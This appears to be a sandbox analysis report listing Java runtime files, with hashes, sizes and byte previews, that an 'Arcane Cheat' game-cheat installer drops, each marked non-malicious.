                                Preview:PK...........H................META-INF/....PK...........H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........H....$...$.......META-INF/mailcap.default#.# This is a very simple 'mailcap' file.#.image/gif;;..x-java-view=com.sun.activation.viewers.ImageViewer.image/jpeg;;..x-java-view=com.sun.activation.viewers.ImageViewer.text/*;;..x-java-view=com.sun.activation.viewers.TextViewer.text/*;;..x-java-edit=com.sun.activation.viewers.TextEditor.PK...........H..{~2...2.......META-INF/mimetypes.default#.# A simple, old format, mime.types file.#.text/html..html htm HTML HTM.text/plain..txt text TXT TEXT.image/gif..gif GIF.image/ief..ief.image/jpeg..jpeg jpg jpe JPG.image/tiff..tiff tif.

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\rt.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java archive data (JAR)
                                Category:dropped
                                Size (bytes):63602929
                                Entropy (8bit):5.963369315504544
                                Encrypted:false
                                SSDEEP:786432:WyfysbZyGp7g85KKwcl0HeJgyll3LTjjA:F0GZTjjA
                                MD5:EDB5B5B3EF4565E4E86BFFE647FB1AA2
                                SHA1:11F5B1B2D729309059B1BD1FE2922251D9451D5F
                                SHA-256:D00351BD39DE7DBF9E9FDBB9EE1FD82189189F9BC82E988B58E1E950D1D4BDC8
                                SHA-512:05E7F9ED915610B70664EB7CB68F3F0BBA5BD5CF208BBDB54007DA5FF6311A6DDBBF057E0DF5A346C9042333C29E5C766B2C0A686628F8655C2E75061A9179C1
                                Malicious:false
                                Preview:PK...........H................META-INF/....PK...........H.5.%...%.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....Name: javax/swing/JCheckBoxMenuItem.class..Java-Bean: True....Name: javax/swing/JDialog.class..Java-Bean: True....Name: javax/swing/JSlider.class..Java-Bean: True....Name: javax/swing/JTextField.class..Java-Bean: True....Name: javax/swing/JTextPane.class..Java-Bean: True....Name: javax/swing/JTextArea.class..Java-Bean: True....Name: javax/swing/JList.class..Java-Bean: True....Name: javax/swing/JFormattedTextField.class..Java-Bean: True....Name: javax/swing/JApplet.class..Java-Bean: True....Name: javax/swing/JSpinner.class..Java-Bean: True....Name: javax/swing/JLabel.class..Java-Bean

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\US_export_policy.jar (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3026
                                Entropy (8bit):7.48902128028383
                                Encrypted:false
                                SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                Malicious:false
                                Preview:PK........F..C................META-INF/MANIFEST.MFe.Ao.0...;....-K....d..e.&.UM.BJ)..h)E..~..v......nXI;.wTv.7.p,.4.R..!R.6Gu.@.T.f.....1....}..l.<.....9..K.F..4L#.5.@.{Ih...L.-B8y.`..q....{.v....|...K.l..=....]...m..........T.E...Ke.^1...2..Rwz..2.......pI...N..m..H..;..?..PK.............PK........F..C................META-INF/ORACLE_J.SFu.Ko.@...;...c...->H<.j)XDA./f.eYy,Y.-.....Mos.f.....P.!.1).A..x.5Tq(...F.f..(q..p)..Q|n....I...*Q..Y..@.FS..Y...<'........E..++..j..`N...b..P.iS.Z.e.<r.[a.....ct.............. ...Z..X...x...T..44.'.......ok...h../Z..*..._..Z~mK...zh.....a........w..W..G._?..h.l....';+..&w....+..;K.......PK..+.s.4.......PK........F..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4...5440.b3....( ...5.r.....i.I.......s@.E..E.%..y...A...GF`.27.......aK....o

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\blacklist (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4149
                                Entropy (8bit):5.816047466650347
                                Encrypted:false
                                SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                Malicious:false
                                Preview:# JNLPAppletLauncher applet-launcher.jar..SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=....# 7066583..SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=..SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=..SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=....# 7066809..SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=..SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=..SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=....# 7186931..SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=..SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=..SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=..SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=..SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=..SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=..SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=..SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=..SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=..SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=..SHA1-Digest-Manifest: g3mA5HqcRBlKa

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\blacklisted.certs (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1273
                                Entropy (8bit):4.167014768533289
                                Encrypted:false
                                SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                MD5:BBEBCF13680E71EC2EE562524DA02660
                                SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                Malicious:false
                                Preview:Algorithm=SHA-256..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..5E83124D68D24E8E177E306DF643D5EA99C5A94D6FC34B072F7544A1CABB7C7B..76A45A496031E4DD2D7ED23E8F6FF97DBDEA980BAAC8B0BA94D7EDB551348645..8A1BD21661C60015065212CC98B1ABB50DFD14C872A208E66BAE890F25C448AF..9ED8F9B0E8E42A1656B8E1DD18F42BA42DC06FE52686173BA2FC70E756F207DC..A686FEE577C88AB664D0787ECDFFF035F4806F3DE418DC9E4D516324FFF02083..B8686723E415534BC0DBD16326F9486F85B0B0799BF6639334E61DAAE67F36CD..D24566BF315F4E597D6E381C87119FB4198F5E9E2607F5F4AB362EF7E2E7672F..D3A936E1A7775A45217C8296A1F22AC5631DCDEC45594099E78EEEBBEDCBA967..DF21016B00FC54F9FE3BC8B039911BB216E9162FAD2FD14D990AB96E9

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\cacerts (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java KeyStore
                                Category:dropped
                                Size (bytes):112860
                                Entropy (8bit):7.58405956263152
                                Encrypted:false
                                SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                MD5:A2C167C8E0F275B234CB2C2E943781C7
                                SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                Malicious:false
                                Preview:...........h......digicertassuredidrootca....Wa....X.509....0...0................F...`...090...*.H........0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0...061110000000Z..311110000000Z0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0.."0...*.H.............0.............C.\...`.q....&...... 9(X`......2a<..(........z.....yS\1.*...26v...<...j.!.Ra. ......d..[_.X.5.G.6.k..8>...3../..(......nD.a5...Y..vm..K.+..r.`..5.xU. ...m..I|1.3l"..2Z......9...:r.......1u..}".?.F..(y...W..~......V.......?........_.wO......c0a0...U...........0...U.......0....0...U......E....1-Q...!..m..0...U.#..0...E....1-Q...!..m..0...*.H.....................rszd...rf.2.Bub.......V.....(...`\.LX..=.IEX.5i..G.V.y...g.....<..&, .=.(.._."...e....gI.]..*.&.x.}?+.&5m_...I[.....=%.....o...dh.-..B.....b.Pg.l....k.6...7|.[mz..F`..'..K...g*h....3f....n...c.....%ml...a...&..q......Q.+

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-3GORA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3527
                                Entropy (8bit):7.521709350514316
                                Encrypted:false
                                SSDEEP:96:XWlvuYcIou1YgHqK3WwGjIEwtR88fH4VVKZ:sutuyOqKmw0QtRpH4VVKZ
                                MD5:57AAAA3176DC28FC554EF0906D01041A
                                SHA1:238B8826E110F58ACB2E1959773B0A577CD4D569
                                SHA-256:B8BECC3EF2E7FF7D2165DD1A4E13B9C59FD626F20A26AF9A32277C1F4B5D5BC7
                                SHA-512:8704B5E3665F28D1A0BC2A063F4BC07BA3C7CD8611E06C0D636A91D5EA55F63E85C6D2AD49E5D8ECE267D43CA3800B3CD09CF369841C94D30692EB715BB0098E
                                Malicious:false
                                Preview:PK........H..C................META-INF/MANIFEST.MF...o.0...;....-..N.I.._..!S..^L..v+....~....K.....9.......-.qLc,.P.N..%QG.b....n...`..m.u...Yw...ak....+to..1.............."m.i8..z}{B...^uV...1..s.>>..Z-.&..%....A..W..t..c....?z.o....A.]d0a...^..a........./..'..NQQ.%...4..l..}....N..A.f..Q[G.K^.S...o..PK.....8....h...PK........H..C................META-INF/ORACLE_J.SF..Ko.0...}.....U....A........-!....c...4..m.E..F.;.G.c..5...AH.qW.93.....-...`...#.Y.1..=.......b....0/.p...`...}...!.N..a'.....'..?eW..(b..SD.(0;*=h.W\.....w........ ........hg. y.....D...1.L'+...P..QOM..f.w...{\m...Tl.&i..!N~..Q.5...8............/.....UzY..$>.}.m..'.............g>.....D.O...o..V...o.O....4....~.2.7..'.o/....}.PK...E..\.......PK........H..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-4IB00.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2515
                                Entropy (8bit):4.490054643169131
                                Encrypted:false
                                SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                MD5:EC90FD04C2890584A16EB24664050C2A
                                SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                Malicious:false
                                Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-6E1P7.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):103
                                Entropy (8bit):4.802539000066613
                                Encrypted:false
                                SSDEEP:3:RSjGIWgjM0ePFUNaXsIGNDAPVnyzowv:RS6c2PFUsXsIrRqoa
                                MD5:E0C4EF8B210C0DDFEE01126E1ACA4280
                                SHA1:F1CC674F447045D668454996D5C3C188884762CD
                                SHA-256:E5CD7F9FD43084674AA749BC8301F28DE85EEF6D01BD78828F72FA32377A3368
                                SHA-512:4820074F15520AD099193B27A673499C31544A7279279EFCB6131D53FE997438A96E1C5B386C233385004F7A2FBB775D4CDE3C0272A196B54C0D8EE6CCEF43DF
                                Malicious:false
                                Preview:..grant codeBase "file:${jnlpx.home}/javaws.jar" {.. permission java.security.AllPermission;..};....

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-8FS1L.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27033
                                Entropy (8bit):4.840685151784295
                                Encrypted:false
                                SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                Malicious:false
                                Preview:#..# This is the "master security properties file"...#..# An alternate java.security properties file may be specified..# from the command line via the system property..#..# -Djava.security.properties=<URL>..#..# This properties file appends to the master security properties file...# If both properties files specify values for the same key, the value..# from the command-line properties file is selected, as it is the last..# one loaded...#..# Also, if you specify..#..# -Djava.security.properties==<URL> (2 equals),..#..# then that properties file completely overrides the master security..# properties file...#..# To disable the ability to specify an additional properties file from..# the command line, set the key security.overridePropertiesFile..# to false in the master security properties file. It is set to true..# by default.....# In this file, various security properties are set for use by..# java.security classes. This is where users can statically register..# Cryptography Packag

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-AOEAG.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Java KeyStore
                                Category:dropped
                                Size (bytes):112860
                                Entropy (8bit):7.58405956263152
                                Encrypted:false
                                SSDEEP:1536:knYlyRHbLD1Syx011lYcdSmjbDKuaG8QlpzHok0SeHX:knYlyRHrq5dbeO9pLD0SiX
                                MD5:A2C167C8E0F275B234CB2C2E943781C7
                                SHA1:2A6B5FBC476EA3A5DDFB4BF1F6CDF0C4DA843BB1
                                SHA-256:A9263831583DFD58BC3584AA0B13E6CDE43403FB82093329B47BB65A8C701AFB
                                SHA-512:8A0C2240C603210AE963C6A126D19BF51659FDED2228503BBF2A2662CCB73B0F9E18C020C9E5E2F3449E2F4F0006D68FE15C8FD5D91DEE8A1A6B42A49183BEAA
                                Malicious:false
                                Preview:...........h......digicertassuredidrootca....Wa....X.509....0...0................F...`...090...*.H........0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0...061110000000Z..311110000000Z0e1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1$0"..U....DigiCert Assured ID Root CA0.."0...*.H.............0.............C.\...`.q....&...... 9(X`......2a<..(........z.....yS\1.*...26v...<...j.!.Ra. ......d..[_.X.5.G.6.k..8>...3../..(......nD.a5...Y..vm..K.+..r.`..5.xU. ...m..I|1.3l"..2Z......9...:r.......1u..}".?.F..(y...W..~......V.......?........_.wO......c0a0...U...........0...U.......0....0...U......E....1-Q...!..m..0...U.#..0...E....1-Q...!..m..0...*.H.....................rszd...rf.2.Bub.......V.....(...`\.LX..=.IEX.5i..G.V.y...g.....<..&, .=.(.._."...e....gI.]..*.&.x.}?+.&5m_...I[.....=%.....o...dh.-..B.....b.Pg.l....k.6...7|.[mz..F`..'..K...g*h....3f....n...c.....%ml...a...&..q......Q.+

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-F94G2.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1273
                                Entropy (8bit):4.167014768533289
                                Encrypted:false
                                SSDEEP:24:NPwGDO0uFVW0mSDEYMZ9HWYZj4bJCC8lCEQqkvZq1n4v3CYe:NPrDJuF4oMyYZj4h8lCENq2+e
                                MD5:BBEBCF13680E71EC2EE562524DA02660
                                SHA1:C5C005C29A80493F5C31CD7EB629AC1B9C752404
                                SHA-256:1FBEA394E634630894CF72DE02DF1846F32F3BB2067B3CB596700E4DD923F4B5
                                SHA-512:B686236EEE055C97A96F5E31A2EE7CE57EED04C2175235CEB19F9F56ABFD22DB6FDCADE8C5D4BA7B656D69E923A1C5844C06DC959A4A915E215FB0ACE377B114
                                Malicious:false
                                Preview:Algorithm=SHA-256..14E6D2764A4B06701C6CBC376A253775F79C782FBCB6C0EE6F99DE4BA1024ADD..31C8FD37DB9B56E708B03D1F01848B068C6DA66F36FB5D82C008C6040FA3E133..3946901F46B0071E90D78279E82FABABCA177231A704BE72C5B0E8918566EA66..450F1B421BB05C8609854884559C323319619E8B06B001EA2DCBB74A23AA3BE2..4CBBF8256BC9888A8007B2F386940A2E394378B0D903CBB3863C5A6394B889CE..4FEE0163686ECBD65DB968E7494F55D84B25486D438E9DE558D629D28CD4D176..5E83124D68D24E8E177E306DF643D5EA99C5A94D6FC34B072F7544A1CABB7C7B..76A45A496031E4DD2D7ED23E8F6FF97DBDEA980BAAC8B0BA94D7EDB551348645..8A1BD21661C60015065212CC98B1ABB50DFD14C872A208E66BAE890F25C448AF..9ED8F9B0E8E42A1656B8E1DD18F42BA42DC06FE52686173BA2FC70E756F207DC..A686FEE577C88AB664D0787ECDFFF035F4806F3DE418DC9E4D516324FFF02083..B8686723E415534BC0DBD16326F9486F85B0B0799BF6639334E61DAAE67F36CD..D24566BF315F4E597D6E381C87119FB4198F5E9E2607F5F4AB362EF7E2E7672F..D3A936E1A7775A45217C8296A1F22AC5631DCDEC45594099E78EEEBBEDCBA967..DF21016B00FC54F9FE3BC8B039911BB216E9162FAD2FD14D990AB96E9

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-JAOE1.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4149
                                Entropy (8bit):5.816047466650347
                                Encrypted:false
                                SSDEEP:96:ubCHVyxwEyPEtpuVFWny6NnXjekkMDV6kiPVNXvNhtfx5e6NgyufTMBwtBsv5XHs:ubCHVyxwEyPEtpuV8ny6NnX6kkMDV6kL
                                MD5:3F5DC1D941E8356CCD04454AC0A7A7D2
                                SHA1:3698F9AFD870C7959E2D8A0DA0A97B4475554831
                                SHA-256:C48D57D64ED98F8F174A4F6873F536AE03B41A63F67079D7C2F7140950A1C02E
                                SHA-512:65319A4EF150884F7E67C6F96085A996C9B32DCF9A539C4EB7AF77B1B46CDD90F1E83446F33DA14467EA37D0628C9411323F5C3D3CEFCF03CBDFA186EEB2BD3C
                                Malicious:false
                                Preview:# JNLPAppletLauncher applet-launcher.jar..SHA1-Digest-Manifest: 5Bo5/eg892hQ9mgbUW56iDmsp1k=....# 7066583..SHA1-Digest-Manifest: x17xGEFzBRXY2pLtXiIbp8J7U9M=..SHA1-Digest-Manifest: ya6YNTzMCFYUO4lwhmz9OWhhIz8=..SHA1-Digest-Manifest: YwuPyF/KMcxcQhgxilzNybFM2+8=....# 7066809..SHA1-Digest-Manifest: dBKbNW1PZSjJ0lGcCeewcCrYx5g=..SHA1-Digest-Manifest: lTYCkD1wm5uDcp2G2PNPcADG/ds=..SHA1-Digest-Manifest: GKwQJtblDEuSVf3LdC1ojpUJRGg=....# 7186931..SHA1-Digest-Manifest: 0CUppG7J6IL8xHqPCnA377Koahw=..SHA1-Digest-Manifest: 3aJU1qSK6IYmt5MSh2IIIj5G1XE=..SHA1-Digest-Manifest: 8F4F0TXA4ureZbfEXWIFm76QGg4=..SHA1-Digest-Manifest: B1NaDg834Bgg+VE9Ca+tDZOd2BI=..SHA1-Digest-Manifest: bOoQga+XxC3j0HiP552+fYCdswo=..SHA1-Digest-Manifest: C4mtepHAyIKiAjjqOm6xYMo8TkM=..SHA1-Digest-Manifest: cDXEH+bR01R8QVxL+KFKYqFgsR0=..SHA1-Digest-Manifest: cO2ccW2cckTvpR0HVgQa362PyHI=..SHA1-Digest-Manifest: D/TyRle6Sl+CDuBFmdOPy03ERaw=..SHA1-Digest-Manifest: eJfWm86yHp2Oz5U8WrMKbpv6GGA=..SHA1-Digest-Manifest: g3mA5HqcRBlKa

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\is-JGNRI.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                Category:dropped
                                Size (bytes):3026
                                Entropy (8bit):7.48902128028383
                                Encrypted:false
                                SSDEEP:48:9JJweDY2LXQ4lAAldrou1YgH767KWajaHpwrHZt0H9BRJgfHilVVt2+HZ:PCcY26Iou1YgHqK3WJGeHn8fH4VVttHZ
                                MD5:EE4ED9C75A1AAA04DFD192382C57900C
                                SHA1:7D69EA3B385BC067738520F1B5C549E1084BE285
                                SHA-256:90012F900CF749A0E52A0775966EF575D390AD46388C49D512838983A554A870
                                SHA-512:EAE6A23D2FD7002A55465844E662D7A5E3ED5A6A8BAF7317897E59A92A4B806DD26F2A19B7C05984745050B4FE3FFA30646A19C0F08451440E415F958204137C
                                Malicious:false
                                Preview:PK........F..C................META-INF/MANIFEST.MFe.Ao.0...;....-K....d..e.&.UM.BJ)..h)E..~..v......nXI;.wTv.7.p,.4.R..!R.6Gu.@.T.f.....1....}..l.<.....9..K.F..4L#.5.@.{Ih...L.-B8y.`..q....{.v....|...K.l..=....]...m..........T.E...Ke.^1...2..Rwz..2.......pI...N..m..H..;..?..PK.............PK........F..C................META-INF/ORACLE_J.SFu.Ko.@...;...c...->H<.j)XDA./f.eYy,Y.-.....Mos.f.....P.!.1).A..x.5Tq(...F.f..(q..p)..Q|n....I...*Q..Y..@.FS..Y...<'........E..++..j..`N...b..P.iS.Z.e.<r.[a.....ct.............. ...Z..X...x...T..44.'.......ok...h../Z..*..._..Z~mK...zh.....a........w..W..G._?..h.l....';+..&w....+..;K.......PK..+.s.4.......PK........F..C................META-INF/ORACLE_J.RSA3hb...........iA....&.+L......l..m....,L...........2.....q..f&F&&&fK..v..s.,.@.....8.CY..B.a..a&gGC!....].3 1'_.1.$.P.@.$.%,.\.....\._\Y\..[....l.l.......J,KT..O+)O,JUp.OIU..L...K7.1..)b...rvE.Rpv4...5440.b3....( ...5.r.....i.I.......s@.E..E.%..y...A...GF`.27.......aK....o

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\java.policy (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2515
                                Entropy (8bit):4.490054643169131
                                Encrypted:false
                                SSDEEP:24:nWjF29ShnQUQH2Hvh4ic1mo6wv1PdOpGLSYLHoQLZQ/1rJ+fSA:n+4AQWxc1tgAFH
                                MD5:EC90FD04C2890584A16EB24664050C2A
                                SHA1:C7FE062EAC95909EC6A5EA93F42DDA5E023AD82C
                                SHA-256:CED51E3926E6B0CFEC8ECAB3B15D296FDCFAE4D32046224814AAAB5FD0FED9C0
                                SHA-512:8DA494925B3B5AAE69A30A8B5F9732E64EDBAE39C968229D112185E349C410A0F5D1B281A4E44718E0120E910820B15CA878B2ED1CF905DFC6595F1BA34B85D3
                                Malicious:false
                                Preview:..// Standard extensions get all permissions by default....grant codeBase "file:${{java.ext.dirs}}/*" {.. permission java.security.AllPermission;..};....// default permissions granted to all domains....grant {.. // Allows any thread to stop itself using the java.lang.Thread.stop().. // method that takes no argument... // Note that this permission is granted by default only to remain.. // backwards compatible... // It is strongly recommended that you either remove this permission.. // from this policy file or further restrict it to code sources.. // that you specify, because Thread.stop() is potentially unsafe... // See the API specification of java.lang.Thread.stop() for more.. // information... permission java.lang.RuntimePermission "stopThread";.... // allows anyone to listen on dynamic ports.. permission java.net.SocketPermission "localhost:0", "listen";.... // "standard" properies that

                                C:\Program Files (x86)\Arcane Cheat\jre\lib\security\java.security (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):27033
                                Entropy (8bit):4.840685151784295
                                Encrypted:false
                                SSDEEP:768:rmLHAEcqrlANbwbqL1AdLAHaPw2kqUTWip+fzIz:rWQaYFqUTWip0kz
                                MD5:409C132FE4EA4ABE9E5EB5A48A385B61
                                SHA1:446D68298BE43EB657934552D656FA9AE240F2A2
                                SHA-256:4D9E5A12B8CAC8B36ECD88468B1C4018BC83C97EB467141901F90358D146A583
                                SHA-512:7FED286AC9AED03E2DAE24C3864EDBBF812B65965C7173CC56CE622179EB5F872F77116275E96E1D52D1C58D3CDEBE4E82B540B968E95D5DA656AA74AD17400D
                                Malicious:false
